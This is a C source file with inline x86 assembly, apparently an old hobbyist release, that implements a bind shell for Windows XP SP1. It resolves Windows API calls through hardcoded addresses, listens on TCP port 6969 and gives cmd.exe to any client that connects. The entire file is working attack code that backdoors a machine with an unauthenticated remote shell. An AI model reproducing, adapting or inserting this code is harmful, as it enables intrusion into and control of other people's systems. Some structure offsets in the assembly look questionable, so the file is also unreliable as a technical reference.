/*
Assembly Bind Shell for Windows XP SP1
by xoclipse
xoclipse@cox.net
http://xoclipse.fraghosts.net
*/

#include <stdio.h>
#include <windows.h>

void doAsm();

int main()
{

	doAsm();

	return 0;
}
//---------------------------------------------------------------------
void doAsm()
{

	char stuff[] = "cmd.exe\0";					//ebp-12
	unsigned int system_address = 0x77c28044;	//ebp-16 
	unsigned int load_library = 0x77e7d961;     //ebp-20
	char stuff1[] = "msvcrt.dll\0";				//ebp-32
	char stuff2[] = "ws2_32.dll\0";				//ebp-44
	unsigned int winsock_version = 0x00000101;  //ebp-48
	unsigned int wsastartup = 0x71ab41da;		//ebp-52
	unsigned int socket_address = 0x71ab5a01;	//ebp-56
	unsigned int socket;						//ebp-60
	struct sockaddr_in sock_info;				//ebp-64
	unsigned int bind_address =	0x71ab3ece;		//ebp-80
	unsigned int listen_address = 0x71ab5de2;	//ebp-84
	unsigned int lasterror =	0x71ab1740;		//ebp-88
	unsigned int client_sock;					//ebp-92
	unsigned int accept_address = 0x71ab868d;	//ebp-96
	unsigned int create_process = 0x77e61bbc;	//ebp-100
	PROCESS_INFORMATION proc_info;				//ebp-104
	STARTUPINFO start_info;						//ebp-120
	unsigned int memset_address = 0x77c43590;	//ebp-188
	unsigned int exit_app = 0x77e798fd;			//ebp-192
	WSAData wsad;								//ebp-196

	//PF_INET=2 | SOCK_STREAM=1 | IPPROTO_TCP=6
	//AF_INET=2	| INADDR_ANY=0
	_asm {

		; LoadLibrary("msvcrt.dll")
		lea eax, dword ptr[ebp-32]
		push eax
		call loadTheLibrary


		; LoadLibrary("ws2_32.dll")
		lea eax, dword ptr[ebp-44]
		push eax
		call loadTheLibrary


		; WSAStartup(MAKEWORD(1,1), &wsad)
		call winsckStartup

		; WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0)
		call socketCall

		; bind() and listen()
		call bindAndListen

		; dispatch shell to listener
		call dispatchShell

		; exit app
		call exitApp

loadTheLibrary:

		push ebp					; put ebp on stack
		mov eax, dword ptr[ebp-20]	; move address of LoadLibrary() into eax
		mov ebp, esp				; save our stack pointer into ebp
		sub esp, 4					; we got 1 argument

		push dword ptr[ebp+8]		; push address of string of library we want to load(1st argument)
		call eax					; call LoadLibrary()

		add esp, 4
		pop ebp
		ret

winsckStartup:

		push ebp					; put ebp on stack
		push eax
		push ebx
		push ecx
		push edx

		mov eax, ebp				; move base pointer into eax
		mov ebp, esp				; move stack pointer into ebp

		lea ebx, [eax-196]			; load address of WSAData structure into eax
		sub ebx, 400				; move address to beginning of struct
		mov ecx, dword ptr[eax-48]	; move winsock version into ecx
		mov edx, dword ptr[eax-52]	; move address of WSAStartup() into edx

		push ebx
		push ecx
		call edx

		pop edx
		pop ecx
		pop ebx
		pop eax
		pop ebp
		ret

socketCall:

		push eax

		mov eax, dword ptr[ebp-56]
		push 0
		push 0
		push 0
		push 6						; IPPROTO_TCP
		push 1						; SOCK_STREAM
		push 2						; PF_INET
		call eax

		mov dword ptr[ebp-60], eax

		pop eax
		ret

bindAndListen:

		push eax
		push ebx
		push ecx

		mov ecx, dword ptr[ebp-60]	; handle of socket

		lea ebx, dword ptr[ebp-64]	; address of sockaddr_in structure

		; fill up structure, sockaddr_in
		mov dword ptr[ebx-12], 391b0002h		; port to listen on(6969) and family-AF_INET
		mov dword ptr[ebx-8], 00000000h			; .s_addr - INADDR_ANY
		mov dword ptr[ebx-4], 00000000h
		mov dword ptr[ebx], 00000000h	
		sub ebx, 12
		

		mov eax, dword ptr[ebp-80]	; address of bind()

		; bind()
		push 00000010h				; sizeof(struct sockaddr_in)
		push ebx					; sockaddr_in structure
		push ecx					; handle to socket
		call eax

		mov eax, dword ptr[ebp-84]
		mov ebx, dword ptr[ebp-60]

		; listen(sockfd, 10)
		push 10
		push ebx
		call eax

		mov eax, dword ptr[ebp-96]
		mov ebx, dword ptr[ebp-60]

		; accept new client
		push 00000000
		push 00000000
		push ebx
		call eax

		mov dword ptr[ebp-92], eax	; client's socket handle

		pop ecx
		pop ebx
		pop eax
		ret

dispatchShell:

		push eax
		push ebx
		push ecx
		push edx

		; memset(&start_info, 0, sizeof(STARTUPINFO));
		lea ebx, dword ptr[ebp-184]
		mov eax, dword ptr[ebp-188]
		push 68
		push 0
		push ebx
		call eax
		add esp, 12

		; fill startup info structure
		mov dword ptr[ebx], 00000044h		; sizeof(STARTUPINFO)
		mov dword ptr[ebx+45], 00000001h	; use std handles
		mov ecx, dword ptr[ebp-92]
		mov dword ptr[ebx+56], ecx			; client handles
		mov dword ptr[ebx+60], ecx
		mov dword ptr[ebx+64], ecx
		
		; CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, ?);
		mov eax, dword ptr[ebp-100]			; address of createprocess
		lea ecx, dword ptr[ebp-116]			; address of processinfo
		lea edx, dword ptr[ebp-12]
		
		push ecx
		push ebx
		push 00000000
		push 00000000
		push 00000000
		push 00000001
		push 00000000
		push 00000000
		push edx
		push 00000000
		call eax

		pop edx
		pop ecx
		pop ebx
		pop eax
		ret
		
exitApp:
		
		push eax
		
		mov eax, dword ptr[ebp-192]
		push 0
		call eax

		pop eax
		ret
	}
}
//-----------------------------------------------------------------